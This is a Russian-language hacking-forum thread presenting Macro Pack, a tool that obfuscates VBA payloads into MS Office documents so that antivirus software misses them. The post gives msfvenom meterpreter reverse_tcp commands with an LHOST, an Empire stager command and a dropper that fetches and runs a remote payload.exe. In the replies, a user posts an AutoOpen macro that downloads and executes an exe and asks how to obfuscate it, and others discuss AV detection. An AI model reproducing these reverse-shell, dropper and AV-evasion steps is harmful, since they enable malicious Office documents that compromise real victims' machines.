Soft MacroPack - Обфускация shellcode

Приветствую, сегодня хочу представить аудитории инструмент, целью которого является обфускация вашего, или где-то позаимствованного кода. Итогом будет, как обещают авторы, снижение агрессии на него АВ-программ. Я полагаю, не нужно обьяснять, что обфусцированные примеры не стоит постить на любимый многими «хакерами» ресурс.

Вот собственно, Macro Pack:

upload_2017-10-11_22-6-21.png


Macro Pack - это инструмент, используемый для автоматизации обфускации и генерации документов MS Office для проведения тестирования на проникновение. Macro Pack – позволяет обойти алгоритмы выявления вредоносного кода антивирусными программами и упростит преобразование vba – полезной нагрузки в окончательный документ Office.

Более подробная информация находится тут:

> sevagas/macro_pack

Особенности:

  • Отсутствует необходимость конфигурирования
  • Необходимые действия могут быть выполнены одной строкой кода
  • Создание Word, Excel и PowerPoint документов
Инструмент совместим с полезными нагрузками, создаваемыми популярными пентест инструментами (Metasploit, Empire, ...). Также легко сочетается с другими утилитами. Этот инструмент написан на Python3 и работает как на платформе Linux, так и на платформе Windows.

Примечание:
Для Windows необходим подлинный пакет MS Office для автоматической генерации документов Office или троянских функций
Обфускация:
  • Переименование функций
  • Переименование переменных
  • Удаление пробелов
  • Удаление комментариев
  • Кодирующие строки
Обратите внимание, что основная цель обфускации Macro Pack заключается не в противодействии обратной инженерии, а в предотвращении обнаружения антивируса.

Установка:
Код:
git clone https://github.com/sevagas/macro_pack
cd macro_pack
upload_2017-10-11_22-6-55.png

Код:
pip3 install -r requirements.txt
upload_2017-10-11_22-7-12.png


Примечание. Для Windows вам необходимо загрузить вручную pywin32

>

Справка:
Код:
macro_pack.py  --help
upload_2017-10-11_22-7-52.png


Использование:

Обфускация полезной нагрузки в формате vba, сгенерированной msfvenom, и помещение результата в новый файл vba.
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v meterobf.vba
Обфускация Empire stager vba файла и создание документа MS Word:
Код:
macro_pack.py -f empire.vba -o -W myDoc.docm
Создание файла MS Excel, содержащего обфускационную капельницу (загрузите файл loadload.exe и храните его как drop.exe)
Код:
echo "https: //myurl.url/payload.exe" "drop.exe" | macro_pack.py -o -t DROPPER -x "drop.xlsm"
Создание документа Word 97, содержащего обфускацию полезной нагрузки обратного подключения VBA в общей папке:
Код:
msfvenom.bat -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.exe -o -w \\ REMOTE-PC \ Share \ meter.doc
Рассмотрим это на небольшом примере:

Обфусцируем VBA от Metasploit:
Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba –o 123.txt
upload_2017-10-11_22-8-53.png

Код:
msfvenom -p windows / meterpreter / reverse_tcp LHOST = 192.168.0.5 -f vba | macro_pack.py -o -v 1234.vba
upload_2017-10-11_22-9-10.png


Результат будет таким:

upload_2017-10-11_22-9-48.png


Полагаю, инструмент окажется полезным и займет место в наборе начинающего/опытного пентестера.

Спасибо за внимание
 
A

akv8

Тестил данный инструмент, и с obfuscate как то грустно сейчас, документ c макросом msfvenom и meterpreter сразу чекается AV.
На nodistributecom, детектов полно. Pro версию никто не доставал?
 

jonni_vu

Green Team
24.06.2017
43
8
BIT
0
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте
 

Doctor zlo

Green Team
18.05.2017
83
35
BIT
0
Ребят в исходниках недавние обновления. Тестил кто сейчас на AV тулзу. И проблемка у меня с pip3 , в kali 2018.3 пишет что команда не найдена. install не выручает, python 3.6.6 стоит.
Вообщем не настраивается инструмент. выручайте
Сегодня поставил все отлично работает. Попробуйте установить pip3 такой командой: sudo apt install python3-pip потом установите зависимости и перейдите в src там будет macro_pack.py
 

acuntenix

Member
30.01.2019
5
0
BIT
0
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
        
        End Sub
 

lomini

Green Team
10.12.2019
50
5
BIT
13
У меня макрос есть готовый на скачку и выполнение *.exe
Как мне зашифровать его ?

Код:
Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long

Sub autoopen()
Dim ret As Long
        Dim HTTPfile As String, LocalFile As String

        HTTPfile = "https://mirror.putty.org.ru/0.71/w64/putty.exe"
        LocalFile = "C:\Users\Public\putty.exe"

        ret = URLDownloadToFile(0, HTTPfile, LocalFile, 0, 0)
        Dim CurDirBackup As String
        Shell "C:\Users\Public\putty.exe", vbNormalFocus
      
        End Sub

Что ты добьешься тем что у тебя выполнится патти ? :)
сессию надо прокидывать метера
 

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 189
BIT
0
я чето шеллкода тут не увидел)

если сравнить с этим
c-shellcode.png

а так хотелось узнать, как его действительно можно обфусцировать)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!